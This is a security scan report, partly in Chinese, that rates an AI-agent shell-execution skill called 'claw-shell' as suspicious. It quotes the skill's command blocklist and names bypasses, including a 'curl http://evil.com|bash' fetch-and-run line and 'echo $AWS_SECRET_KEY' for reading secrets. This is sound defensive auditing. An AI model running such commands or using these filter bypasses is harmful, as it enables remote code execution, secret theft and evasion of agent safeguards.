claw-shell 安全扫描报告 — 可疑 | ClawSafe

48 /100

claw-shell

Run shell commands inside tmux session for AI agent interaction

Shell execution tool with declared purpose but weak safety filter that can be bypassed, allowing potentially destructive commands.

技能名称claw-shell

分析耗时34.6s

引擎pi

⚠

谨慎使用

Add more comprehensive command validation, use allowlist approach instead of blocklist, add timeout limits, and consider sandboxing tmux session.

安全发现 4 项

严重性	安全发现	位置
高危	Unrestricted shell execution with weak safety controls 代码执行 The skill uses execSync to execute arbitrary shell commands with only a basic blocklist filter. The filter in isDangerous() can be bypassed with variations like 'rmdir', uppercase commands, or piped remote scripts. `const bad = ['sudo', ' rm ', ' rm-', 'reboot', 'shutdown', 'mkfs', 'dd '];` → Implement allowlist approach for commands or use more comprehensive validation. Add command timeouts and resource limits.	`handler.js:18`
中危	Dangerous commands bypass filter 代码执行 Commands like 'rmdir', 'chmod 777', '> file' redirection, or 'curl http://evil.com\|bash' are not blocked by the current filter. `const bad = ['sudo', ' rm ', ' rm-', 'reboot', 'shutdown', 'mkfs', 'dd '];` → Add coverage for more dangerous operations including file permissions, network downloads, and recursive deletion.	`handler.js:18`
中危	Indirect environment variable access 敏感访问 While not explicitly accessing environment, the shell execution allows reading $API_KEY, $SECRET, etc. via commands like 'echo $AWS_SECRET_KEY' execSync(`tmux send-keys -t claw "${escaped}" C-m`); → Consider sanitizing commands that query environment variables or restrict to specific paths.	`handler.js:14`
低危	No command timeout configured 代码执行 execSync calls have no timeout specified, allowing commands to hang indefinitely. `await new Promise(r => setTimeout(r, 500));` → Add timeout option to execSync calls.	`handler.js:29`

资源类型	声明权限	推断权限	状态	证据
命令执行	`WRITE`	`WRITE`	✓ 一致	execSync used in handler.js:1,7,10
文件系统	`WRITE`	`WRITE`	✓ 一致	Shell can execute any file operation
网络访问	`WRITE`	`WRITE`	✓ 一致	Shell can execute curl/wget/netcat
环境变量	`NONE`	`READ`	✓ 一致	Shell commands can read $ENV vars
剪贴板	`NONE`	`NONE`	—
浏览器	`NONE`	`NONE`	—
数据库	`NONE`	`NONE`	—

1 项发现

🔗

中危外部 URL 外部 URL

https://x.com/...

SKILL.md:39

目录结构

3 文件 · 2.4 KB · 106 行

JavaScript 1f · 57L Markdown 1f · 44L JSON 1f · 5L

├─ 📋 _meta.json JSON 5L · 129 B

├─ 📜 handler.js JavaScript 57L · 1.4 KB

└─ 📝 SKILL.md Markdown 44L · 928 B

安全亮点

✓ Purpose and capabilities are clearly documented in SKILL.md

✓ Uses dedicated tmux session 'claw' for isolation

✓ Basic safety filter exists for clearly dangerous commands

✓ No hidden functionality or obfuscation detected

✓ No credential harvesting or data exfiltration observed

✓ Single-purpose tool with focused functionality